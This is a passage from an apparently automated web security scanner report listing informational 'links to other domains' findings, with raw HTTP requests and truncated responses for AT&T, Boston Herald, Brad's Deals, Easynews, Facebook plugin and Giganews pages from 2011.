</script><script type="text/javascript" language="JavaScript1.2" src="http://s19.sitemeter.com/js/counter.js?site=s19actvalue"></script><noscript><a href="http://s19.sitemeter.com/stats.asp?site=s19actvalue" target="_top"><img src="http://s19.sitemeter.com/meter.asp?site=s19actvalue" alt="Site Meter" border=0></a>
...[SNIP]...

17.141. http://www.att.com/media/gvp/gvpUtils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /media/gvp/gvpUtils.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /media/gvp/gvpUtils.js?2011-09-16-11-30-26 HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388; TLTHID=CD44864EE0C910E0095E9C3AFD3198B7; TLTSID=CD44864EE0C910E0095E9C3AFD3198B7; TLTUID=CD44864EE0C910E0095E9C3AFD3198B7; B2CSESSIONID=Q2lRTzzXGBJTxL!-1935813224; DYN_USER_ID=4200816524; DYN_USER_CONFIRM=9364325c1a8e3d6fcb7f813ca16d55db; BIGipServerpATTWL_7010_7011=1037160839.25115.0000

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 05 Aug 2011 18:18:47 GMT
ETag: "a348-4a9c620dfcfc0"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 41800
Cache-Control: max-age=900
Date: Sat, 17 Sep 2011 01:52:12 GMT
Connection: close

function gvpUtils() {
   var W3C = (!document.all && document.getElementById);
   var IE = (document.all);
   var ns4 = (document.layers);
   var v_debug = false;
   var vMainInit = '';
   var vBrowBackButS
...[SNIP]...
alled with error code: "+rplCode);
if(typeof rplCode != 'undefined') {
   if(rplCode == 'noFlash') {
               // user has no flash
               this.getElementObj("gvp_mainPopupBody").innerHTML = '<a href="http://www.adobe.com/products/flashplayer/" target="_Fp"><img src="'+p_locEnv+'global_resources/defaultMedia/GVP_NoFlash.jpg" border="0" onload="gvp.divPopUp(\'gvp_mainPopupDiv\',true);" border="0" />
...[SNIP]...
ath;
                   var loc = window.location.href;
                   //alert(loc);
                   if(loc.indexOf('smartphones')!= -1) {
                       singleVidPath = 'std_vid';
                       this.getElementObj("gvp_mainPopupBody").innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="480" height="360" id="gvp_pop" align="TL"><param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</object>';
                       shouldShow = true;
                   } else {
                       singleVidPath = 'gvp_vid';
                       this.getElementObj("gvp_mainPopupBody").innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="516" height="292" id="gvp_pop" align="middle"><param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
.getFlashVersion()) {
                       this.rplFlash('noFlash');
                   } else {
                       if( pConfig.indexOf('gvpLgFormat') == -1 ) {
   this.getElementObj("gvp_mainPopupBody").innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="516" height="415" id="gvp_pop" align="middle"><param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</object>';
} else {
   this.getElementObj("gvp_mainPopupBody").innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="516" height="415" id="gvp_pop" align="middle"><param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...

17.142. http://www.bostonherald.com/mobile/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mobile/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mobile/view.bg?articleid=1366388 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; bhpopup=on; __utma=1.249425585.1316021953.1316021953.1316239295.2; __utmb=1.1.10.1316239295; __utmc=1; __utmz=1.1316239295.2.2.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.44.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 13852
Connection: close


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html>
<head>

<!-- // mobile.tmpl // -->

<title> Mobile - BostonHerald.
...[SNIP]...
<meta name="SECTION" content="" />

<link rel=stylesheet type=text/css href=http://cache.heraldinteractive.com/navigation/style.css>
<link rel="apple-touch-icon" href="http://cache.heraldinteractive.com/images/version5.0/site_images/iphone_icon.png"/>


<style type="text/css">
...[SNIP]...
<div id="topLeft"><img src="http://cache.heraldinteractive.com/mobile/images/boston_herald_mobile.gif"></div>
...[SNIP]...
<p class="paragraph bords"><img src="http://multimedia.heraldinteractive.com/images/20110916/d616c1_Base_09162011.jpg" alt="This undated photo provided by the U.S. Air Force shows Davis-Monthan Air Force Base near Tucson, Ariz. The base was on lockdown this afternoon, amid unconfirmed reports of gunfire." />
<br/>
...[SNIP]...
<p id="footer">
&copy; Copyright by the Boston Herald and <a href=http://www.heraldmedia.com>Herald Media</a>. No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href=http://www.hiasys.com/pc.html>Privacy Commitment</font>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.143. http://www.bradsdeals.com/dealsoftheday/subscribe/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:34:39 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe t
...[SNIP]...
<!-- Optimizely Testing Code -->    
   <script src="//cdn.optimizely.com/js/5830034.js"></script>
...[SNIP]...
<div id="GiveawayContest"><a href="http://www.facebook.com/bradsdeals?sk=app_196172927117823" target="_blank"><img src="/images/promos/contest_HP_dv6t_3.jpg" alt="HP Pavilion dv6t Quad Giveaway Contest" width="940" height="80" />
...[SNIP]...
<li id="fContactTwitter"><a href="http://twitter.com/bradsdeals">twitter.com/bradsdeals</a>
...[SNIP]...
<li id="fContactFacebook"><a href="http://facebook.com/bradsdeals">facebook.com/bradsdeals</a>
...[SNIP]...
<p><a href="http://www.blackfriday2011.com/"><img src="http://www.bradsdeals.com/res/images/logo_blackfriday2011.png" alt="BlackFriday2011.com" />
...[SNIP]...
<p>Research, plan and execute the <a href="http://www.blackfriday2011.com/">best Black Friday shopping</a>
...[SNIP]...
<p><a href="http://www.cybermonday2011.com/"><img src="http://www.bradsdeals.com/res/images/logo_cybermonday2011.png" alt="CyberMonday2011.com" />
...[SNIP]...
<p>Find the best <a href="http://www.cybermonday2011.com/">Cyber Monday 2011 deals, sales, and coupons</a>
...[SNIP]...
<p><a href="http://www.strangedeals.com"><img src="http://www.bradsdeals.com/res/images/logo_strangedeals.png" alt="StrangeDeals.com" />
...[SNIP]...
<p>Find <a href="http://www.strangedeals.com">hysterical items</a>
...[SNIP]...
<li><a href="http://www.blackfriday2011.com">Black Friday 2011</a>
...[SNIP]...
<li><a href="http://www.cybermonday2011.com">Cyber Monday 2011</a>
...[SNIP]...
</script> <script type='text/javascript' src='http://static.fmpub.net/site/bradsdeals'></script>
...[SNIP]...

17.144. http://www.easynews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easynews.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CJzUx83AoqsCFRdlgwod-2urfQ HTTP/1.1
Host: www.easynews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:22 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Fri, 23 Sep 2011 19:31:22 GMT
Content-Type: text/html
Content-Length: 48871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<li><a href="https://secure.campaigner.com/CSB/Public/Form.aspx?fid=627650" target="_blank">NEWSLETTER</a>
...[SNIP]...
<div id="social"><a href="http://www.facebook.com/pages/Easynews/310629822549" target="_blank"><img src="/images/bottomfold/fbnav.png" border="0" alt="Facebook Us" /></a> <a href="http://www.twitter.com/easynews" target="_blank"><img src="/images/bottomfold/twnav.png" border="0" alt="Follow us on Twitter" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/p_XcpZzYBfs?fs=1&amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="370" height="248"></embed>
...[SNIP]...
<br />
<a href="https://secure.campaigner.com/CSB/Public/Form.aspx?fid=627650">Subscribe to our Newsletter</a>
...[SNIP]...

17.145. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.169.37
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:49 GMT
Content-Length: 16940

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="dnaC";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_38dfd0184ffbeaa1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Jacqueline Kennedy: In Her Own Words, Part 1 Full Episode - ABC News Specials - ABC" href="http://abc.go.com/watch/abc-news-specials/SH559036/VD55142959/jacqueline-kennedy-in-her-own-words-part-1" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQArfaA8YFh-mNgS&amp;url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FNEWS_20110913_JackieOpt1_episode_3c88ec8a-3087-425d-af6f-e494abfdf426_3920741_220x124.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/watch/abc-news-specials/SH559036/VD55142959/jacqueline-kennedy-in-her-own-words-part-1" target="_blank">Jacqueline Kennedy: In Her Own Words, Part 1 Full Episode - ABC News Specials - ABC</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2d6831a643699867"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="The View 9/15 Full Episode - The View - ABC" href="http://abc.go.com/watch/the-view/SH559080/VD55143233/the-view-915" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDGRz3lUBVEE3s5&amp;url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FVIEW_20110915_View20110915FEP_episode_40548dc3-430c-409e-940a-0c004ce5a6d7_3925319_220x124.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/watch/the-view/SH559080/VD55143233/the-view-915" target="_blank">The View 9/15 Full Episode - The View - ABC</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_55933d138033e1c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Modern Family&#039;s Season 3 Premiere!!" href="http://abc.go.com/shows/modern-family/video-detail/featured/modern-familys-season-3-premiere/pl_PL5520993/vd_VD55143123" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBA_RpVNZTCHt5C&amp;url=http%3A%2F%2Fcdn.video.abc.com%2Fvideo%2Fthumbnails%2F117x66%2FMDF_2011080008_MDFPremiereBTS_BehindTheScenes_HD1080p_a92ae76c-dbf0-4c83-b1d7-fc990cc7509b_3919181.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/shows/modern-family/video-detail/featured/modern-familys-season-3-premiere/pl_PL5520993/vd_VD55143123" target="_blank">Modern Family&#039;s Season 3 Premiere!!</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_17c8f4392653c74d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="First Look: Revenge Revenge - ABC" href="http://abc.go.com/watch/clip/revenge/SH014195250000/PL55126742/VD55142671/first-look-revenge" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAl2xmjj0Yt6CB5&amp;url=http%3A%2F%2Fsecure-us.imrworldwide.com%2Fcgi-bin%2Fm%3Fci%3Dus-504159h%26cg%3D0%26cc%3D1%26ts%3Dnoscript" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/watch/clip/revenge/SH014195250000/PL55126742/VD55142671/first-look-revenge" target="_blank">First Look: Revenge Revenge - ABC</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7afaaf73c4e56bfc"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Week 6, Part 1 Full Episode - Bachelor Pad - ABC" href="http://abc.go.com/watch/bachelor-pad/SH5573770/VD55142747/week-6-part-1" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCY8lmUcO2YgrAS&amp;url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FBCP_207_BCP207part1_episode_c86279b7-1896-4402-9b26-c7eaf6b8f43e_3917597_220x124.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/watch/bachelor-pad/SH5573770/VD55142747/week-6-part-1" target="_blank">Week 6, Part 1 Full Episode - Bachelor Pad - ABC</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7d91319bd2cdcc4f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="20/20 9/11: Remembrance and Renewal Full Episode - 20/20 - ABC" href="http://abc.go.com/watch/2020/SH559026/VD55142540/2020-911-remembrance-and-renewal" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCV33-OCrCuwHpc&amp;url=http%3A%2F%2Fa.abcnews.go.com%2Fimages%2F2020%2Fabc_2020_sept11_full_110911_220x124.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/watch/2020/SH559026/VD55142540/2020-911-remembrance-and-renewal" target="_blank">20/20 9/11: Remembrance and Renewal Full Episode - 20/20 - ABC</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1c39bba3bd13a125"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Does This Avatar Make Me Look Fat? Full Episode - Wipeout - ABC" href="http://abc.go.com/watch/wipeout/SH5568487/VD55142876/does-this-avatar-make-me-look-fat" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDfn3slQlNOcEn5&amp;url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FWIP_431_WIP431_episode_d3fa1fd6-e452-4c7d-8d33-bf0895742919_3919534_220x124.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/watch/wipeout/SH5568487/VD55142876/does-this-avatar-make-me-look-fat" target="_blank">Does This Avatar Make Me Look Fat? Full Episode - Wipeout - ABC</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_c761eaf122d2401"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Staind - Not Again" href="http://abc.go.com/shows/jimmy-kimmel-live/video-detail/music-performances/pl_PL5520981/vd_VD55142953" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCD55NzrFBv39X8&amp;url=http%3A%2F%2Fcdn.video.abc.com%2Fvideo%2Fthumbnails%2F117x66%2FJKLC_20110913_StaindNotAgain_Concert_HD720p_37b22ebc-17fe-40cb-bfab-3899c2608deb_3921101.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://abc.go.com/shows/jimmy-kimmel-live/video-detail/music-performances/pl_PL5520981/vd_VD55142953" target="_blank">Staind - Not Again</a>
...[SNIP]...

17.146. http://www.facebook.com/plugins/facepile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/facepile.php?action=like&api_key=180186532021462&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22a9c1b6c%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2Fbradsdeals&locale=en_US&login_text=&max_rows=1&sdk=joey&size=small&tense=past&width=200 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.38
X-Cnection: close
Date: Sat, 17 Sep 2011 01:38:10 GMT
Content-Length: 7538

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/facepile.php";window._EagleEyeSeed="pNsB";</scri
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/tRfGGwGuu8y.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

17.147. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2147b80ac%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.8.33
X-Cnection: close
Date: Sat, 17 Sep 2011 00:58:01 GMT
Content-Length: 9196

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/CharliesAngelsABC" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277062_205702799462197_1903390228_q.jpg" alt="Charlie&#039;s Angels" /></a>
...[SNIP]...

17.148. http://www.giganews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Response

HTTP/1.1 200 OK
